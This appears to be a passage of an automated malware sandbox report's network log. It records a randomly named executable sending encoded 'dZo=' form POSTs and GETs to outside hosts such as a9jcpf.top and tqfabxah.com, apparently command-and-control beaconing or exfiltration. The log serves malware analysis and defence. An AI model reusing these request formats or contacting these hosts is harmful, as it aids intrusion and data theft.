0IBdi116gd0rvwPTKndsSIROXiwrhHs+0Hkpupj/5pfa7D5BUxZERxlkbNy9KmzihR7fw7wlolZKJLQPBvUbf9Ip [TRUNCATED]
                                                      Aug 18, 2024 18:26:27.651304007 CEST533INHTTP/1.1 404 Not Found
                                                      Date: Sun, 18 Aug 2024 16:26:27 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.954138203.161.55.102801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:29.592091084 CEST439OUTGET /irn0/?dZo=rkk12BbGqxBZ8yyWFarCeZT80GKzND/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdyK4b8CTwfAsUn2lCVR5NZfuQrKb84WQ==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.slushcafe.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:26:30.196692944 CEST548INHTTP/1.1 404 Not Found
                                                      Date: Sun, 18 Aug 2024 16:26:30 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.954139216.83.33.145801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:35.626837015 CEST689OUTPOST /mpex/ HTTP/1.1
                                                      Host: www.a9jcpf.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.a9jcpf.top
                                                      Referer: http://www.a9jcpf.top/mpex/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 55 5a 58 50 55 62 61 38 4c 41 76 6f 66 37 30 77 42 6f 56 4e 75 55 4b 73 79 4b 64 30 6d 58 45 33 47 42 66 36 58 76 72 44 6b 61 53 31 73 64 51 78 63 33 58 55 35 2b 6f 38 6a 61 41 72 38 58 39 35 75 6e 61 64 31 57 52 76 57 72 37 62 43 65 37 74 42 74 50 32 4e 7a 31 38 65 57 39 54 61 61 53 32 57 68 76 69 6b 63 53 4a 4f 58 7a 56 62 74 73 59 32 36 63 2f 66 4b 6e 41 5a 58 49 47 57 2f 45 73 6b 41 65 6d 6e 55 35 74 30 43 6e 57 75 4b 2b 4f 4f 4d 42 30 41 62 64 6d 74 67 7a 76 50 31 69 72 36 2f 65 41 59 42 50 35 72 35 7a 72 53 4e 5a 47 71 4e 4d 35 76 46 63 67 4f 35 51 6f
                                                      Data Ascii: dZo=UZXPUba8LAvof70wBoVNuUKsyKd0mXE3GBf6XvrDkaS1sdQxc3XU5+o8jaAr8X95unad1WRvWr7bCe7tBtP2Nz18eW9TaaS2WhvikcSJOXzVbtsY26c/fKnAZXIGW/EskAemnU5t0CnWuK+OOMB0AbdmtgzvP1ir6/eAYBP5r5zrSNZGqNM5vFcgO5Qo
                                                      Aug 18, 2024 18:26:36.533597946 CEST208INHTTP/1.1 530
                                                      Date: Sun, 18 Aug 2024 16:26:36 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Server: cdn
                                                      Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 31 36 2e 38 33 2e 33 33 2e 31 34 35 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2c216.83.33.145 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.954140216.83.33.145801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:38.152477980 CEST713OUTPOST /mpex/ HTTP/1.1
                                                      Host: www.a9jcpf.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.a9jcpf.top
                                                      Referer: http://www.a9jcpf.top/mpex/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 55 5a 58 50 55 62 61 38 4c 41 76 6f 66 61 45 77 45 50 35 4e 35 45 4b 74 75 36 64 30 7a 48 46 77 47 42 6a 36 58 72 36 62 6b 73 69 31 73 34 73 78 64 79 37 55 34 2b 6f 38 70 36 41 75 34 58 39 69 75 6e 48 69 31 58 39 76 57 76 54 62 43 63 7a 74 43 61 54 31 50 6a 31 79 48 47 39 52 58 36 53 32 57 68 76 69 6b 63 58 53 4f 58 72 56 61 63 63 59 33 65 49 2b 42 61 6e 50 52 33 49 47 53 2f 45 6f 6b 41 65 59 6e 56 31 48 30 42 54 57 75 4c 4f 4f 50 64 42 31 4a 62 64 6b 6a 41 7a 77 66 33 7a 2b 37 65 69 53 51 51 48 51 71 34 58 39 63 4d 35 59 37 2f 46 69 36 53 63 48 4a 65 5a 41 35 43 46 61 77 57 6c 6b 4b 4a 68 42 5a 69 44 77 34 6d 52 71 64 77 3d 3d
                                                      Data Ascii: dZo=UZXPUba8LAvofaEwEP5N5EKtu6d0zHFwGBj6Xr6bksi1s4sxdy7U4+o8p6Au4X9iunHi1X9vWvTbCcztCaT1Pj1yHG9RX6S2WhvikcXSOXrVaccY3eI+BanPR3IGS/EokAeYnV1H0BTWuLOOPdB1JbdkjAzwf3z+7eiSQQHQq4X9cM5Y7/Fi6ScHJeZA5CFawWlkKJhBZiDw4mRqdw==
                                                      Aug 18, 2024 18:26:39.070369005 CEST208INHTTP/1.1 530
                                                      Date: Sun, 18 Aug 2024 16:26:38 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Server: cdn
                                                      Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 31 36 2e 38 33 2e 33 33 2e 31 34 35 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2c216.83.33.145 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.954141216.83.33.145801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:40.685551882 CEST1726OUTPOST /mpex/ HTTP/1.1
                                                      Host: www.a9jcpf.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.a9jcpf.top
                                                      Referer: http://www.a9jcpf.top/mpex/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 55 5a 58 50 55 62 61 38 4c 41 76 6f 66 61 45 77 45 50 35 4e 35 45 4b 74 75 36 64 30 7a 48 46 77 47 42 6a 36 58 72 36 62 6b 73 71 31 73 75 34 78 66 52 44 55 37 2b 6f 38 71 36 41 76 34 58 38 34 75 6e 66 6d 31 57 41 61 57 70 58 62 43 35 2f 74 44 75 6e 31 56 7a 31 79 49 6d 39 55 61 61 53 5a 57 68 2f 75 6b 66 2f 53 4f 58 72 56 61 65 45 59 2b 71 63 2b 44 61 6e 41 5a 58 49 4b 57 2f 45 41 6b 42 32 75 6e 56 68 39 30 53 4c 57 70 72 65 4f 4d 76 70 31 47 62 64 69 7a 51 79 6c 66 33 2b 75 37 64 47 76 51 51 7a 2b 71 2f 6a 39 65 49 38 47 2f 2b 38 2f 6c 51 67 57 4f 74 73 68 68 48 4a 59 71 57 4d 76 4b 71 74 6e 4f 7a 4b 46 38 31 73 50 4f 65 66 69 76 71 59 2f 4e 36 67 6a 78 49 72 35 74 31 4e 62 53 32 7a 47 58 44 62 79 46 6f 7a 75 39 6a 46 47 33 2b 52 64 6e 79 75 44 36 44 70 41 55 4b 5a 5a 6d 31 63 56 30 6b 2b 64 5a 39 6e 78 48 6b 49 42 6b 73 43 46 6c 30 75 68 67 79 32 41 58 30 52 38 42 56 30 74 43 76 6a 69 51 57 78 50 48 69 6d 71 74 37 4c 7a 6a 4b 33 53 44 38 50 73 49 67 63 4a 62 38 72 74 58 4d 31 39 50 6b [TRUNCATED]
                                                      Data Ascii: dZo=UZXPUba8LAvofaEwEP5N5EKtu6d0zHFwGBj6Xr6bksq1su4xfRDU7+o8q6Av4X84unfm1WAaWpXbC5/tDun1Vz1yIm9UaaSZWh/ukf/SOXrVaeEY+qc+DanAZXIKW/EAkB2unVh90SLWpreOMvp1GbdizQylf3+u7dGvQQz+q/j9eI8G/+8/lQgWOtshhHJYqWMvKqtnOzKF81sPOefivqY/N6gjxIr5t1NbS2zGXDbyFozu9jFG3+RdnyuD6DpAUKZZm1cV0k+dZ9nxHkIBksCFl0uhgy2AX0R8BV0tCvjiQWxPHimqt7LzjK3SD8PsIgcJb8rtXM19PkxrXHS0+bJYo0JssW55kqisbeQo2fWsWlpJxgSipfnhnnFyy7wwLwPDRvPKruiPArUCM/BKDo4TloWeBCfAoNQ8aX57FC+XIloRwDklEhMbkS8emAxv7Wcp1FyHX9v0jDIGTv1I9ZGnAHlmHuIqfAd3+PxHX2MLKUSqAd25R8oZoHSpzR7xVyT6qhkF/tTMY7ZxYX4Zo59x+YDdSzR3RJxFlcqZ+N+H3IGGkc+kG7He009Bedych1/XqD5XHs3EjLk8+TGBPcWg+ZogpZ0+O/+0T6wwK95AT1B49MFHhSHk33fB0euI3doOekgPExTXaRHWuLitY5ghIo05acGwo+jLDYw3Cc5NRH6xYun1HbPQBV0nJGLf0lr4TQ8QmsPk+eqniSNVDo33wsBW4myDeqUdNzXP/dMkmZqEh7IiQHH578Wh0hOj0JdDf4Y5trIb8tKHoN6tlUx7BMiCIRcPNlf0aslx1fhOu4D8876mVEUstZyxLso+xVgmvA2iB2EBcj64eoqPGpQ3jWSylUl7jUtdnlLwTTxEIWhy9gXPN/f7lBDHvSvz3pYg8s9Qfoph51l9RCUhkTqLiJ6rACBPxL63FEhyL1EJejVdISrc09hIvxIJ/aC4R3bSwC/hu+il9D2yX7wzODH4zWGpcb4XQRe4C8/3E8Y+dHZl [TRUNCATED]
                                                      Aug 18, 2024 18:26:41.584238052 CEST208INHTTP/1.1 530
                                                      Date: Sun, 18 Aug 2024 16:26:41 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Server: cdn
                                                      Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 31 36 2e 38 33 2e 33 33 2e 31 34 35 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2c216.83.33.145 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.954142216.83.33.145801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:43.384511948 CEST436OUTGET /mpex/?dZo=Zb/vXsPYNAfjWKU6DONX2DmivYpazk1zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3VTZ4C1VoYJ2+BjO5oufoKkfdfMAaow==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.a9jcpf.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:26:44.311353922 CEST208INHTTP/1.1 530
                                                      Date: Sun, 18 Aug 2024 16:26:44 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Server: cdn
                                                      Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 31 36 2e 38 33 2e 33 33 2e 31 34 35 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2c216.83.33.145 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.95414335.241.42.217801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:49.988517046 CEST695OUTPOST /zjwj/ HTTP/1.1
                                                      Host: www.tqfabxah.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.tqfabxah.com
                                                      Referer: http://www.tqfabxah.com/zjwj/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 71 46 6a 69 61 54 4a 50 45 58 63 55 66 67 66 31 30 47 6c 7a 41 6c 6a 74 4e 4f 66 2f 75 67 6a 75 64 34 6b 58 74 44 4d 78 6c 53 61 50 78 47 48 49 58 38 61 55 68 64 31 74 35 6a 6d 4b 56 65 4f 38 35 62 76 58 77 49 59 74 6e 44 4f 65 48 61 6b 71 4e 72 33 39 47 51 66 76 47 53 38 51 37 69 74 51 6f 46 32 4a 6a 48 47 6b 48 68 36 67 68 71 69 33 39 69 37 49 63 52 42 49 4b 79 6d 63 6c 4c 2b 4e 4e 6c 6c 48 74 70 38 41 36 7a 6a 4f 6e 50 5a 74 4d 63 6f 55 58 4a 50 6f 43 34 43 39 4a 44 34 62 78 46 49 4d 4a 6e 38 39 53 61 31 53 67 6b 50 49 55 30 6c 31 7a 42 32 7a 59 75 68 4a
                                                      Data Ascii: dZo=qFjiaTJPEXcUfgf10GlzAljtNOf/ugjud4kXtDMxlSaPxGHIX8aUhd1t5jmKVeO85bvXwIYtnDOeHakqNr39GQfvGS8Q7itQoF2JjHGkHh6ghqi39i7IcRBIKymclL+NNllHtp8A6zjOnPZtMcoUXJPoC4C9JD4bxFIMJn89Sa1SgkPIU0l1zB2zYuhJ
                                                      Aug 18, 2024 18:26:50.632245064 CEST176INHTTP/1.1 405 Method Not Allowed
                                                      Server: nginx/1.20.2
                                                      Date: Sun, 18 Aug 2024 16:26:50 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 559
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Aug 18, 2024 18:26:50.634627104 CEST559INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.95414435.241.42.217801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:52.529439926 CEST719OUTPOST /zjwj/ HTTP/1.1
                                                      Host: www.tqfabxah.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.tqfabxah.com
                                                      Referer: http://www.tqfabxah.com/zjwj/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 71 46 6a 69 61 54 4a 50 45 58 63 55 65 41 76 31 78 6c 4e 7a 42 46 6a 75 43 75 66 2f 6b 41 6a 79 64 34 59 58 74 43 35 30 77 77 2b 50 79 6a 72 49 59 59 75 55 69 64 31 74 68 54 6d 44 61 2b 4f 4e 35 62 7a 31 77 4a 6b 74 6e 41 79 65 48 59 73 71 4e 59 76 38 48 41 66 70 41 53 39 57 6a 43 74 51 6f 46 32 4a 6a 47 6a 44 48 68 69 67 68 61 79 33 39 48 62 48 56 78 42 4c 4e 79 6d 63 79 62 2b 4a 4e 6c 6b 69 74 74 63 71 36 78 72 4f 6e 4f 4a 74 4c 4e 70 43 5a 4a 50 79 63 34 43 72 59 43 59 65 30 46 56 55 49 6b 6f 37 49 4a 6c 39 6e 46 76 57 46 47 73 75 6d 57 32 55 66 4a 6f 68 50 6f 71 6a 52 6a 39 2b 55 4d 64 65 30 62 78 69 63 52 4a 78 2b 77 3d 3d
                                                      Data Ascii: dZo=qFjiaTJPEXcUeAv1xlNzBFjuCuf/kAjyd4YXtC50ww+PyjrIYYuUid1thTmDa+ON5bz1wJktnAyeHYsqNYv8HAfpAS9WjCtQoF2JjGjDHhighay39HbHVxBLNymcyb+JNlkittcq6xrOnOJtLNpCZJPyc4CrYCYe0FVUIko7IJl9nFvWFGsumW2UfJohPoqjRj9+UMde0bxicRJx+w==
                                                      Aug 18, 2024 18:26:53.193691015 CEST176INHTTP/1.1 405 Method Not Allowed
                                                      Server: nginx/1.20.2
                                                      Date: Sun, 18 Aug 2024 16:26:53 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 559
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Aug 18, 2024 18:26:53.197258949 CEST559INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.95414535.241.42.217801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:55.059035063 CEST1732OUTPOST /zjwj/ HTTP/1.1
                                                      Host: www.tqfabxah.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.tqfabxah.com
                                                      Referer: http://www.tqfabxah.com/zjwj/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 71 46 6a 69 61 54 4a 50 45 58 63 55 65 41 76 31 78 6c 4e 7a 42 46 6a 75 43 75 66 2f 6b 41 6a 79 64 34 59 58 74 43 35 30 77 77 32 50 78 52 6a 49 58 66 79 55 6a 64 31 74 2f 6a 6d 4f 61 2b 4f 55 35 62 37 78 77 4a 6f 39 6e 47 32 65 42 39 67 71 63 64 62 38 49 41 66 70 4e 79 39 47 37 69 74 46 6f 45 47 4e 6a 48 54 44 48 68 69 67 68 63 2b 33 36 53 37 48 5a 52 42 49 4b 79 6d 59 6c 4c 2b 78 4e 68 41 55 74 73 63 51 35 42 4c 4f 6e 76 35 74 4f 37 31 43 52 4a 50 73 49 59 44 6f 59 43 56 4f 30 46 49 6c 49 6e 31 65 49 4a 74 39 6a 79 71 38 56 6c 30 43 34 6b 4f 6c 49 65 45 65 4e 59 69 37 4c 7a 5a 37 4e 66 55 39 6b 35 6f 42 64 31 59 6c 6f 4e 4e 4c 68 44 65 54 31 77 41 66 75 39 55 56 76 7a 45 6a 76 77 53 73 4b 79 76 53 49 61 33 4f 61 55 72 54 70 32 50 77 56 67 72 46 58 77 30 78 49 79 32 30 4e 53 74 6e 34 74 62 44 34 4d 64 41 52 6b 2f 68 49 46 6c 50 45 6c 44 37 52 64 73 36 57 35 63 7a 4e 47 44 39 57 62 59 41 75 4d 4e 45 41 6b 45 6e 2b 4a 58 30 35 77 4f 4b 45 4c 38 4a 2b 32 42 4b 56 51 32 48 49 50 2f 35 6e 54 [TRUNCATED]
                                                      Data Ascii: dZo=qFjiaTJPEXcUeAv1xlNzBFjuCuf/kAjyd4YXtC50ww2PxRjIXfyUjd1t/jmOa+OU5b7xwJo9nG2eB9gqcdb8IAfpNy9G7itFoEGNjHTDHhighc+36S7HZRBIKymYlL+xNhAUtscQ5BLOnv5tO71CRJPsIYDoYCVO0FIlIn1eIJt9jyq8Vl0C4kOlIeEeNYi7LzZ7NfU9k5oBd1YloNNLhDeT1wAfu9UVvzEjvwSsKyvSIa3OaUrTp2PwVgrFXw0xIy20NStn4tbD4MdARk/hIFlPElD7Rds6W5czNGD9WbYAuMNEAkEn+JX05wOKEL8J+2BKVQ2HIP/5nTkAPAzi60hhhlqQ0yUji5LlpDnKCzPvPK0nA4XDxDc/KgYS1WEcVxAbM2AuxMjkw/h3EAoHNx83Q9WZq/9QmwoDKN+L5EmZO3E0BhWdZyXKcp62gY+zcLARPaJJkaHMnffACfb5MfeLuu19V4uNGEjbdB0f18meyrJ+cQpNZQzbg8VSryYrjX/0ZO3DXWSVNQDj++fPSrd9W51ZLckBpuhEv0itKuPOgxPz6y14sAX3oyzvlz4PUxLV3bHrI6L8/PTmGo8IT385bAZEouVTaN66qo0qYsybtcd53dsXy0A5TOXCAqSUQR4vcHxwQiMwvKTHwSddS4zxi22nwUyxK5Uvl1idrEMJr6aFUeRSwBu+gXqNlZOI0iBeH1gT+R57gFv1Sl0rJZutrbPSR5ALzW7uL7mmIRECdPNBY4PLuTexW7rJihwRD09de75lQtVD9yWpx/LcWuf5VIUZWROeE4MvyyUjUQ4DeFANVYozGP5s/rfIidvKn1uxP/AMyqojFIQ9pPmrdJRrVFMCwjwfg8kMVLclcRJL68IIUwP8n6l0YmXOOAfS8sBOmgKR4YDhqa3N99wvpgMqnOh0Iog45FLkOFfXY1pQPODmMou0nqBl5Ctx7icS9lgCc6yK9dcbjYSATJa8ORgbi8cMwl9n8Wgfu5LIYxNe8iDP [TRUNCATED]
                                                      Aug 18, 2024 18:26:55.734154940 CEST176INHTTP/1.1 405 Method Not Allowed
                                                      Server: nginx/1.20.2
                                                      Date: Sun, 18 Aug 2024 16:26:55 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 559
                                                      Via: 1.1 google
                                                      Connection: close
